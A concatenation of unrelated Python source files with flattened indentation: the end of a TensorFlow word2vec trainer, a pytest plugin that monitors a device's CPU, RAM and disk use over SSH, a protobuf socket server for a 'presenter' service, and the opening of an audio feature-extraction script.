analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._w_in, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of _targets and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, opts.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time = initial_words, time.time()
while True:
time.sleep(5) # Reports our progress once a while.
(epoch, step, words,
lr) = self._session.run([self._epoch, self.step, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
lr, rate),
end="")
sys.stdout.flush()
if epoch != initial_epoch:
break
for t in workers:
t.join()
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
global_step=model.step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy(b'france', b'paris', b'russia')
# [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
pytest_dut_monitor.py | import pytest
import paramiko
import threading
import logging
import time
import os
import yaml
from collections import OrderedDict
from datetime import datetime
from errors import HDDThresholdExceeded, RAMThresholdExceeded, CPUThresholdExceeded
logger = logging.getLogger(__name__)
DUT_MONITOR = "/tmp/dut_monitor.py"
DUT_CPU_LOG = "/tmp/cpu.log"
DUT_RAM_LOG = "/tmp/ram.log"
DUT_HDD_LOG = "/tmp/hdd.log"
THRESHOLDS = os.path.join(os.path.split(__file__)[0], "thresholds.yml")
def pytest_addoption(parser):
"""Describe plugin specified options"""
parser.addoption("--dut_monitor", action="store_true", default=False,
help="Enable DUT hardware resources monitoring")
parser.addoption("--thresholds_file", action="store", default=None, help="Path to the custom thresholds file")
def pytest_configure(config):
if config.option.dut_monitor:
config.pluginmanager.register(DUTMonitorPlugin(), "dut_monitor")
if config.option.thresholds_file:
global THRESHOLDS
THRESHOLDS = config.option.thresholds_file
def pytest_unconfigure(config):
dut_monitor = getattr(config, "dut_monitor", None)
if dut_monitor:
del config.dut_monitor
config.pluginmanager.unregister(dut_monitor)
class DUTMonitorPlugin(object):
"""
Pytest plugin which defines:
- pytest fixtures: 'dut_ssh' and 'dut_monitor'
- handlers to verify that measured CPU, RAM and HDD values during each test item execution
does not exceed defined threshold
"""
@pytest.fixture(autouse=True, scope="session")
def dut_ssh(self, testbed, creds):
"""Establish SSH connection with DUT"""
ssh = DUTMonitorClient(host=testbed["dut"], user=creds["sonicadmin_user"],
password=creds["sonicadmin_password"])
yield ssh
@pytest.fixture(autouse=True, scope="function")
def dut_monitor(self, dut_ssh, localhost, duthost, testbed_devices):
"""
For each test item starts monitoring of hardware resources consumption on the DUT
"""
dut_thresholds = {}
monitor_exceptions = []
# Start monitoring on DUT
dut_ssh.start()
# Read file with defined thresholds
with open(THRESHOLDS) as stream:
general_thresholds = yaml.safe_load(stream)
dut_thresholds = general_thresholds["default"]
dut_platform = testbed_devices["dut"].facts["platform"]
dut_hwsku = testbed_devices["dut"].facts["hwsku"]
if dut_platform in general_thresholds:
dut_thresholds.update(general_thresholds[dut_platform]["default"])
if dut_hwsku in general_thresholds[dut_platform]["hwsku"]:
dut_thresholds.update(general_thresholds[dut_platform]["hwsku"][dut_hwsku])
yield dut_thresholds
# Stop monitoring on DUT
dut_ssh.stop()
# Download log files with CPU, RAM and HDD measurements data
measurements = dut_ssh.get_log_files()
# Verify hardware resources consumption does not exceed defined threshold
if measurements["hdd"]:
try:
self.assert_hhd(hdd_meas=measurements["hdd"], thresholds=dut_thresholds)
except HDDThresholdExceeded as err:
monitor_exceptions.append(err)
if measurements["ram"]:
try:
self.assert_ram(ram_meas=measurements["ram"], thresholds=dut_thresholds)
except RAMThresholdExceeded as err:
monitor_exceptions.append(err)
if measurements["cpu"]:
try:
self.assert_cpu(cpu_meas=measurements["cpu"], thresholds=dut_thresholds)
except CPUThresholdExceeded as err:
monitor_exceptions.append(err)
if monitor_exceptions:
raise Exception("\n".join(item.message for item in monitor_exceptions))
def assert_hhd(self, hdd_meas, thresholds):
"""
Verify that free disk space on the DUT is not overutilized
"""
overused = []
fail_msg = "Used HDD threshold - {}\nHDD overuse:\n".format(thresholds["hdd_used"])
for timestamp, used_hdd in hdd_meas.items():
if used_hdd > thresholds["hdd_used"]:
overused.append((timestamp, used_hdd))
if overused:
raise HDDThresholdExceeded(fail_msg + "\n".join(str(item) for item in overused))
def assert_ram(self, ram_meas, thresholds):
"""
Verify that RAM resources on the DUT are not overutilized
"""
failed = False
peak_overused = []
fail_msg = "\nRAM thresholds: peak - {}; before/after test difference - {}%\n".format(thresholds["ram_peak"],
thresholds["ram_delta"])
for timestamp, used_ram in ram_meas.items():
if used_ram > thresholds["ram_peak"]:
peak_overused.append((timestamp, used_ram))
if peak_overused:
fail_msg = fail_msg + "RAM overuse:\n{}\n".format("\n".join(str(item) for item in peak_overused))
failed = True
# Take first and last RAM measurements
if len(ram_meas) >= 4:
before = sum(ram_meas.values()[0:2]) / 2
after = sum(ram_meas.values()[2:4]) / 2
else:
before = ram_meas.values()[0]
after = ram_meas.values()[-1]
delta = thresholds["ram_delta"] / 100. * before
if after >= before + delta:
fail_msg = fail_msg + "RAM was not restored\nRAM before test {}; RAM after test {}\n".format(before, after)
failed = True
if failed:
raise RAMThresholdExceeded(fail_msg)
def assert_cpu(self, cpu_meas, thresholds):
"""
Verify that CPU resources on the DUT are not overutilized
"""
failed = False
total_overused = []
process_overused = {}
cpu_thresholds = "CPU thresholds: total - {}; per process - {}; average - {}\n".format(thresholds["cpu_total"],
thresholds["cpu_process"],
thresholds["cpu_total_average"])
average_cpu = "\n> Average CPU consumption during test run {}; Threshold - {}\n"
fail_msg = ""
total_sum = 0
t_format = "%Y-%m-%d %H:%M:%S"
def handle_process_measurements(p_name, t_first, t_last, p_average):
"""Compose fail message if process overuse CPU durig 'cpu_measure_duration' interval."""
msg_template = "> Process '{}'\nAverage CPU overuse {} during {} seconds\n{}"
duration = (t_last - t_first).total_seconds()
if duration >= thresholds["cpu_measure_duration"]:
return msg_template.format(process_name,
p_average,
duration,
"{} - {}\n".format(t_first.strftime(t_format),
t_last.strftime(t_format)))
return ""
def handle_total_measurements(overused_list):
"""Compose fail message if CPU utilization exceeds threshold during 'duration' interval."""
fail_msg = ""
start = datetime.strptime(overused_list[0][0], t_format)
end = datetime.strptime(overused_list[-1][0], t_format)
if (end - start).total_seconds() >= thresholds["cpu_measure_duration"]:
fail_msg = "Total CPU overuse during {} seconds.\n{}\n\n".format((end - start).total_seconds(),
"\n".join([str(item) for item in overused_list])
)
del overused_list[0:]
return fail_msg
# Calculate total CPU utilization
for m_id, timestamp in enumerate(cpu_meas):
# Collect total CPU utilization to calculate total average
total_sum += cpu_meas[timestamp]["total"]
if cpu_meas[timestamp]["total"] > thresholds["cpu_total"]:
total_overused.append((timestamp, cpu_meas[timestamp]["total"]))
if m_id == (len(cpu_meas) - 1):
fail_msg += handle_total_measurements(total_overused)
total_overused = []
elif total_overused:
fail_msg += handle_total_measurements(total_overused)
total_overused = []
for process_consumption, process_name in cpu_meas[timestamp]["top_consumer"].items():
if process_consumption >= thresholds["cpu_process"]:
if process_name not in process_overused:
process_overused[process_name] = []
# Collect list of CPU utilization for specific process if CPU utilization exceeds threshold
process_overused[process_name].append((timestamp, process_consumption))
# Handle measurements per process
if process_overused:
for process_name, process_consumption in process_overused.items():
timestamps = []
process_sum = 0
for m_id, m_value in enumerate(process_consumption):
t_stamp = datetime.strptime(m_value[0], t_format)
process_sum += m_value[1]
if not timestamps:
timestamps.append(t_stamp)
continue
if (2 <= (t_stamp - timestamps[-1]).total_seconds() <= 3):
timestamps.append(t_stamp)
if m_id == (len(process_consumption) - 1):
fail_msg += handle_process_measurements(p_name=process_name,
t_first=timestamps[0],
t_last=timestamps[-1],
p_average=process_sum / len(timestamps))
else:
fail_msg += handle_process_measurements(p_name=process_name,
t_first=timestamps[0],
t_last=timestamps[-1],
p_average=process_sum / len(timestamps))
timestamps = []
process_sum = 0
# Calculate average CPU utilization
if (total_sum / len(cpu_meas)) > thresholds["cpu_total_average"]:
fail_msg += average_cpu.format(total_sum / len(cpu_meas), thresholds["cpu_total_average"])
if fail_msg:
raise CPUThresholdExceeded(cpu_thresholds + fail_msg)
class DUTMonitorClient(object):
"""
DUTMonitorClient object establish SSH connection with DUT. Keeps SSH connection with DUT during full test run.
Available features:
- start/stop hardware resources monitoring on DUT
- automatically restart monitoring script on the DUT in case of lose network connectivity (device reboot, etc.)
"""
def __init__(self, host, user, password):
self.running = False
self.user = user
self.password = password
self.host = host
self.init()
self.run_channel = None
self._thread = threading.Thread(name="Connection tracker", target=self._track_connection)
self._thread.setDaemon(True)
self._thread.start()
def _track_connection(self):
"""
@summary: Track network connectivity. Reestablish network connection in case of drop connection
"""
while True:
try:
self.ssh.exec_command("true", timeout=5)
except (paramiko.SSHException, AttributeError):
logger.warning("SSH connection dropped")
logger.debug("Trying to reconnect...")
self.close()
try:
self.init()
except Exception as err:
logger.debug(repr(err))
else:
if self.running:
self.start()
else:
time.sleep(5)
def _upload_to_dut(self):
"""
@summary: Upload 'dut_monitor.py' module to the DUT '/tmp' folder
"""
logger.debug("Uploading file to the DUT...")
with self.ssh.open_sftp() as sftp:
sftp.put(os.path.join(os.path.split(__file__)[0], "dut_monitor.py"), DUT_MONITOR)
def init(self):
"""
@summary: Connect to the DUT via SSH and authenticate to it.
"""
logger.debug("Trying to establish connection ...")
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh.connect(self.host, username=self.user, password=self.password, timeout=5)
def close(self):
"""
@summary: Close this SSHClient and its underlying Transport
"""
logger.debug("Close SSH connection with DUT")
self.ssh.close()
def exec_command(self, cmd, timeout=None):
"""
@summary: Execute a command on the DUT and track possible connectivity issues.
A new Channel is opened and the requested command is executed
"""
try:
return self.ssh.exec_command(cmd, timeout=timeout, get_pty=True)
except Exception as err:
logger.warning("Broken connection - {}".format(repr(err)))
logger.warning("Skip command {}".format(cmd))
return (None, None, None)
def start(self):
"""
@summary: Start HW resources monitoring on the DUT.
Write obtained values to the following files on the DUT: DUT_CPU_LOG, DUT_RAM_LOG, DUT_HDD_LOG
"""
self.running = True
self._upload_to_dut()
logger.debug("Start HW resources monitoring on the DUT...")
self.run_channel = self.ssh.get_transport().open_session()
self.run_channel.get_pty()
self.run_channel.settimeout(5)
# Start monitoring on DUT
self.run_channel.exec_command("python {} --start".format(DUT_MONITOR))
# Ensure monitoring started
output = self.run_channel.recv(1024)
if not "Started resources monitoring ..." in output:
raise Exception("Failed to start monitoring on DUT: {}".format(output))
def stop(self):
"""
@summary: Close this SSHClient and its underlying Transport
"""
self.running = False
logger.debug("Stop resources monitoring on the DUT...")
if not self.run_channel.closed:
self.run_channel.close()
def read_yml(self, file_pointer):
"""
@summary: Read yaml file content. Convert it to the ordered data.
@return: OrderedDict with sorted keys by timestamp, or empty dict for empty file.
"""
with file_pointer as fp:
measurements = yaml.safe_load("".join(fp))
if measurements is None:
return {}
# Sort json data to process logs chronologically
keys = measurements.keys()
keys.sort()
key_value_pairs = [(item, measurements[item]) for item in keys]
return OrderedDict(key_value_pairs)
def get_log_files(self):
"""
@summary: Fetch monitoring logs from device, parse, convert to dictionary with sorted order.
@return: Dictionary with keys "cpu", "ram", "hdd", values contains appropriate measurements made on DUT.
"""
logger.debug("Downloading file from the DUT...")
cpu_log_fp = self.ssh.open_sftp().file(DUT_CPU_LOG)
ram_log_fp = self.ssh.open_sftp().file(DUT_RAM_LOG)
hdd_log_fp = self.ssh.open_sftp().file(DUT_HDD_LOG)
cpu_meas = self.read_yml(cpu_log_fp)
ram_meas = self.read_yml(ram_log_fp)
hdd_meas = self.read_yml(hdd_log_fp)
return {"cpu": cpu_meas, "ram": ram_meas, "hdd": hdd_meas}
|
presenter_socket_server.py | # =======================================================================
#
# Copyright (C) 2018, Hisilicon Technologies Co., Ltd. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1 Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2 Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3 Neither the names of the copyright holders nor the names of the
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# =======================================================================
#
"""presenter socket server module"""
import threading
import select
import struct
import logging
import socket
from google.protobuf.message import DecodeError
import common.presenter_message_pb2 as pb2
from common.channel_manager import ChannelManager
from common.channel_handler import ChannelHandler
#read nothing from socket.recv()
SOCK_RECV_NULL = b''
# epool will return if no event coming in 1 s
EPOLL_TIMEOUT = 1
# it specifies the number of unaccepted connections that
# the system will allow before refusing new connections.
SOCKET_WAIT_QUEUE = 2
# message head length, include 4 bytes message total length
# and 1 byte message name length
MSG_HEAD_LENGTH = 5
#presenter server的socket服务端
class PresenterSocketServer():
"""a socket server communication with presenter agent.
"""
def __init__(self, server_address):
"""
Args:
server_address: server listen address,
include an ipv4 address and a port.
"""
# thread exit switch, if set true, thread must exit immediately.
self.thread_exit_switch = False
# message head length, include 4 bytes message total length
# and 1 byte message name length
self.msg_head_len = 5
#创建服务端socket
self._create_socket_server(server_address)
#创建服务端socket
def _create_socket_server(self, server_address):
"""
create a socket server
Args:
server_address: server listen address,
include an ipv4 address and a port.
"""
# Create a socket server.
self._sock_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._sock_server.bind(server_address)
self._sock_server.listen(SOCKET_WAIT_QUEUE)
self._sock_server.setblocking(False)
# Get server host name and port
host, port = self._sock_server.getsockname()[:2]
# Start presenter socket server thread.启动服务端socket监听线程
threading.Thread(target=self._server_listen_thread).start()
# Display directly on the screen
print('Presenter socket server listen on %s:%s\n' % (host, port))
def set_exit_switch(self):
"""set switch True to stop presenter socket server thread."""
self.thread_exit_switch = True
def _read_socket(self, conn, read_len):
'''
Read fixed length data
Args:
conn: a socket connection
read_len: read fix byte.
Returns:
ret: True or False
buf: read fix byte buf.
'''
has_read_len = 0
read_buf = SOCK_RECV_NULL
total_buf = SOCK_RECV_NULL
while has_read_len != read_len:
try:
read_buf = conn.recv(read_len - has_read_len)
except socket.error:
logging.error("socket %u exception:socket.error", conn.fileno())
return False, None
if read_buf == SOCK_RECV_NULL:
return False, None
total_buf += read_buf
has_read_len = len(total_buf)
return True, total_buf
def _read_msg_head(self, sock_fileno, conns):
'''
Args:
sock_fileno: a socket fileno
conns: all socket connections which created by server.
Returns:
msg_total_len: total message length.
msg_name_len: message name length.
'''
ret, msg_head = self._read_socket(conns[sock_fileno], self.msg_head_len)
if not ret:
logging.error("socket %u receive msg head null", sock_fileno)
return None, None
# in Struct(), 'I' is unsigned int, 'B' is unsigned char
msg_head_data = struct.Struct('IB')
(msg_total_len, msg_name_len) = msg_head_data.unpack(msg_head)
msg_total_len = socket.ntohl(msg_total_len)
return msg_total_len, msg_name_len
def _read_msg_name(self, sock_fd, conns, msg_name_len):
'''
Args:
sock_fd: a socket fileno
conns: all socket connections which created by server.
msg_name_len: message name length.
Returns:
ret: True or False
msg_name: message name.
'''
ret, msg_name = self._read_socket(conns[sock_fd], msg_name_len)
if not ret:
logging.error("socket %u receive msg name null", sock_fd)
return False, None
try:
msg_name = msg_name.decode("utf-8")
except UnicodeDecodeError:
logging.error("msg name decode to utf-8 error")
return False, None
return True, msg_name
def _read_msg_body(self, sock_fd, conns, msg_body_len, msgs):
'''
Args:
sock_fd: a socket fileno
conns: all socket connections which created by server.
msg_name_len: message name length.
msgs: msg read from a socket
Returns:
ret: True or False
'''
ret, msg_body = self._read_socket(conns[sock_fd], msg_body_len)
if not ret:
logging.error("socket %u receive msg body null", sock_fd)
return False
msgs[sock_fd] = msg_body
return True
def _read_sock_and_process_msg(self, sock_fileno, conns, msgs):
'''
Args:
sock_fileno: a socket fileno, return value of socket.fileno()
conns: all socket connections registered in epoll
msgs: msg read from a socket
Returns:
ret: True or False
'''
# Step1: read msg head
msg_total_len, msg_name_len = self._read_msg_head(sock_fileno, conns)
if msg_total_len is None:
logging.error("msg_total_len is None.")
return False
# Step2: read msg name
ret, msg_name = self._read_msg_name(sock_fileno, conns, msg_name_len)
if not ret:
return ret
# Step3: read msg body
msg_body_len = msg_total_len - self.msg_head_len - msg_name_len
if msg_body_len < 0:
logging.error("msg_total_len:%u, msg_name_len:%u, msg_body_len:%u",
msg_total_len, msg_name_len, msg_body_len)
return False
ret = self._read_msg_body(sock_fileno, conns, msg_body_len, msgs)
if not ret:
return ret
# Step4: process msg
ret = self._process_msg(conns[sock_fileno], msg_name, msgs[sock_fileno])
return ret
def _process_epollin(self, sock_fileno, epoll, conns, msgs):
'''
Args:
sock_fileno: a socket fileno, return value of socket.fileno()
epoll: a set of select.epoll.
conns: all socket connections registered in epoll
msgs: msg read from a socket
'''
msgs[sock_fileno] = b''
try:
ret = self._read_sock_and_process_msg(sock_fileno, conns, msgs)
if not ret:
self._clean_connect(sock_fileno, epoll, conns, msgs)
except socket.error:
logging.error("receive socket error.")
self._clean_connect(sock_fileno, epoll, conns, msgs)
def _accept_new_socket(self, epoll, conns):
'''
Args:
epoll: a set of select.epoll.
conns: all socket connections registered in epoll
'''
try:
new_conn, address = self._sock_server.accept()
new_conn.setblocking(True)
epoll.register(new_conn.fileno(), select.EPOLLIN | select.EPOLLHUP)
conns[new_conn.fileno()] = new_conn
logging.info("create new connection:client-ip:%s, client-port:%s, fd:%s",
address[0], address[1], new_conn.fileno())
except socket.error:
logging.error("socket.error exception when sock.accept()")
def _server_listen_thread(self):
"""socket server thread, epoll listening all the socket events"""
epoll = select.epoll()
epoll.register(self._sock_server.fileno(), select.EPOLLIN | select.EPOLLHUP)
try:
conns = {}
msgs = {}
while True:
# thread must exit immediately
if self.thread_exit_switch:
break
events = epoll.poll(EPOLL_TIMEOUT)
# timeout, but no event come, continue waiting
if not events:
continue
for sock_fileno, event in events:
# new connection request from presenter agent
if self._sock_server.fileno() == sock_fileno:
self._accept_new_socket(epoll, conns)
# remote connection closed
# it means presenter agent exit withot close socket.
elif event & select.EPOLLHUP:
logging.info("receive event EPOLLHUP")
self._clean_connect(sock_fileno, epoll, conns, msgs)
# new data coming in a socket connection
elif event & select.EPOLLIN:
self._process_epollin(sock_fileno, epoll, conns, msgs)
# receive event not recognize
else:
logging.error("not recognize event %f", event)
self._clean_connect(sock_fileno, epoll, conns, msgs)
finally:
logging.info("conns:%s", conns)
logging.info("presenter server listen thread exit.")
epoll.unregister(self._sock_server.fileno())
epoll.close()
self._sock_server.close()
def _process_heartbeat(self, conn):
'''
set heartbeat
Args:
conn: a socket connection
Returns:
True: set heartbeat ok.
'''
sock_fileno = conn.fileno()
handler = self.channel_manager.get_channel_handler_by_fd(sock_fileno)
if handler is not None:
handler.set_heartbeat()
return True
#处理agent发起的通道初始化请求
def _process_open_channel(self, conn, msg_data):
"""
Deserialization protobuf and process open_channel request
Args:
conn: a socket connection
msg_data: a protobuf struct, include open channel request.
Returns:
protobuf structure like this:
----------------------------------------------
|channel_name | string |
|----------------------------------------------
|content_type | ChannelContentType |
|----------------------------------------------
enum ChannelContentType {
kChannelContentTypeImage = 0;
kChannelContentTypeVideo = 1;
}
"""
request = pb2.OpenChannelRequest()
response = pb2.OpenChannelResponse()
try:
#解析请求数据
request.ParseFromString(msg_data)
except DecodeError:
#如果通道参数解析失败,给agent端发回应,回应中错误码为pb2.kOpenChannelErrorOther
logging.error("ParseFromString exception: Error parsing message")
channel_name = "unknown channel"
return self._response_open_channel(conn, channel_name, response,
pb2.kOpenChannelErrorOther)
#获取通道名称
channel_name = request.channel_name
# check channel name if exist 如果通道不存在,则创建
if not self.channel_manager.is_channel_exist(channel_name):
logging.error("channel name %s is not exist.", channel_name)
# if channel is not exist, need to create the channel
ret = self.channel_manager.register_one_channel(channel_name)
if ret != ChannelManager.err_code_ok:
#如果创建失败,给agent发回应,回应中错误码为pb2.kOpenChannelErrorOther
logging.error("Create the channel %s failed!, and ret is %d", channel_name, ret)
err_code = pb2.kOpenChannelErrorOther
self._response_open_channel(conn, channel_name, response, err_code)
# check channel path if busy 如果通道处于busy状态,给agent发回应,回应中错误码为pb2.kOpenChannelErrorChannelAlreadyOpened
if self.channel_manager.is_channel_busy(channel_name):
logging.error("channel path %s is busy.", channel_name)
err_code = pb2.kOpenChannelErrorChannelAlreadyOpened
return self._response_open_channel(conn, channel_name, response,
err_code)
# if channel type is image, need clean image if exist
self.channel_manager.clean_channel_image(channel_name)
#检查channel类型是image还是video
if request.content_type == pb2.kChannelContentTypeImage:
media_type = "image"
elif request.content_type == pb2.kChannelContentTypeVideo:
media_type = "video"
else:
#如果类型错误,则回应pb2.kOpenChannelErrorOther
logging.error("media type %s is not recognized.",
request.content_type)
return self._response_open_channel(conn, channel_name, response,
pb2.kOpenChannelErrorOther)
handler = ChannelHandler(channel_name, media_type)
self.channel_manager.create_channel_resource(
channel_name, conn.fileno(), media_type, handler)
return self._response_open_channel(conn, channel_name, response,
pb2.kOpenChannelErrorNone)
#发送开启通道的回应消息
def _response_open_channel(self, conn, channel_name, response, err_code):
"""
Assemble protobuf to response open_channel request
Args:
conn: a socket connection
channel_name: name of a channel.
response: a protobuf response to presenter agent
err_code: part of the response
Returns:
ret_code:True or False
Message structure like this:
--------------------------------------------------------------------
|total message len | int | 4 bytes |
|-------------------------------------------------------------------
|message name len | byte | 1 byte |
|-------------------------------------------------------------------
|message name | string | xx bytes |
|-------------------------------------------------------------------
|message body | protobuf | xx bytes |
--------------------------------------------------------------------
protobuf structure like this:
--------------------------------------------------------------------
|error_code | enum | OpenChannelErrorCode |
|-------------------------------------------------------------------
|error_message | string | xx bytes |
|-------------------------------------------------------------------
enum OpenChannelErrorCode {
kOpenChannelErrorNone = 0;
kOpenChannelErrorNoSuchChannel = 1;
kOpenChannelErrorChannelAlreadyOpened = 2;
kOpenChannelErrorOther = -1;
}
"""
response.error_code = err_code
ret_code = False
if err_code == pb2.kOpenChannelErrorNoSuchChannel:
response.error_message = "channel {} not exist." \
.format(channel_name)
elif err_code == pb2.kOpenChannelErrorChannelAlreadyOpened:
response.error_message = "channel {} is busy.".format(channel_name)
elif err_code == pb2.kOpenChannelErrorNone:
response.error_message = "open channel succeed"
ret_code = True
else:
response.error_message = "Unknown err open channel {}." \
.format(channel_name)
self.send_message(conn, response, pb2._OPENCHANNELRESPONSE.full_name)
return ret_code
def send_message(self, conn, protobuf, msg_name):
'''
API for send message
Args:
conn: a socket connection.
protobuf: message body defined in protobuf.
msg_name: msg name.
Returns: NA
'''
message_data = protobuf.SerializeToString()
message_len = len(message_data)
msg_name_size = len(msg_name)
msg_total_size = self.msg_head_len + msg_name_size + message_len
# in Struct(), 'I' is unsigned int, 'B' is unsigned char
s = struct.Struct('IB')
msg_head = (socket.htonl(msg_total_size), msg_name_size)
packed_msg_head = s.pack(*msg_head)
msg_data = packed_msg_head + \
bytes(msg_name, encoding="utf-8") + message_data
conn.sendall(msg_data)
|
feature_extract.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 Wu Yi-Chiao (Nagoya University)
# based on a WaveNet script by Tomoki Hayashi (Nagoya University)
# (https://github.com/kan-bayashi/PytorchWaveNetVocoder)
# based on sprocket-vc script by Kazuhiro Kobayashi (Nagoya University)
# (https://github.com/k2kobayashi/sprocket)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
import argparse
import logging
import multiprocessing as mp
import os
import sys
import copy
import pyworld
import numpy as np
from distutils.util import strtobool
from numpy.matlib import repmat
from scipy.interpolate import interp1d
from scipy.io import wavfile
from scipy.signal import firwin
from scipy.signal import lfilter
from sprocket.speech.feature_extractor import FeatureExtractor
from sprocket.speech.synthesizer import Synthesizer
from utils import (find_files, read_txt, read_hdf5, write_hdf5, check_hdf5)
def _get_arguments():
parser = argparse.ArgumentParser(
description="making feature file argsurations.")
# path setting
parser.add_argument("--waveforms", required=True,
type=str, help="directory or list of input wav files")
parser.add_argument("--feature_dir", default=None,
type=str, help="directory of output featfile")
# acoustic feature setting
parser.add_argument("--feature_type", default="world", choices=["world"],
type=str, help="feature type")
parser.add_argument("--feature_format", default="h5",
type=str, help="feature format")
parser.add_argument("--fs", default=22050,
type=int, help="sampling frequency")
parser.add_argument("--shiftms", default=5.0,
type=float, help="frame shift in msec")
parser.add_argument("--fftl", default=1024,
type=int, help="FFT length")
parser.add_argument("--minf0", default=40,
type=float, help="minimum f0")
parser.add_argument("--maxf0", default=400,
type=float, help="maximum f0")
parser.add_argument("--pow_th", default=-20,
type=float, help="speech power threshold")
parser.add_argument("--mcep_dim", default=34,
type=int, help="dimension of mel cepstrum")
